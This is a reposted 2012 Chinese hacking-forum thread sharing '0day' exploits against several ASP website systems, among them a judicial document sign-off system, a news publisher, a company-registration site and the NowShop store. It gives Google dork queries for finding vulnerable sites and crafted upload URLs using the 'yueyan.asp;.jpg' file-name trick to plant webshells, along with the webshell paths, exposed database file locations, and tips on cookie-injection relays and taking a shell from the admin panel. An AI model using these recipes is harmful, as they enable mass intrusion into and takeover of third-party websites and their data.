大家赶紧的多个0day (下)---转载
本帖最后由 tianyueabc 于 2012-7-13 13:54 编辑网纪互联公文签收系统司法版通杀上传漏洞
网纪互联公文签收系统司法版通杀上传漏洞
google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞文件:in_file.asp
构造语句:in_file.asp?file_name=yueyan.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/yueyan.asp;.jpg
漏洞分析:同这个0day差不多,原理相同
某新闻发布系统漏洞
无意发现一个站有注入 然后找下关键字发现是某套程序然后找了下关键字
关键字:inurl:onews.asp?id=
有些是加入了防注入代码 但大部分都没过滤cookies 可以注入中转下。
php的注入漏洞和上传是非常好挖的,只要你在拿站是多留意下建站系统呀,getshell方法呀。。。。
多注意就会发现,有很多漏洞都是通用的。
中国是山寨大国,这些建站系统都是这个抄袭哪个,哪个抄袭这个的,瞬间无语了。,
康城公司注册类网站系统
康城公司注册类网站系统 v9.6
关键字:inurl:company.asp?title=
数据库:Databases/kangchengiop.mdb
或者Databases/kangcheng.mdb
cookies 注入中转
后台拿shell
cookies 名小子 可以上传
ewe 修改样式
数据库备份
插一句 建议不使用!!
NowShop商城系统上传0day
上传页面:admin/upload.asp
上传语句构造:admin/upload.asp?fuptype=db&fupname=yueyan.asp;&frmname=yueyan.asp
本地上传:yueyan.jpg
具体就不说明了。。。
学习中,还不知道怎么用。。 支持 了、
页:
[1]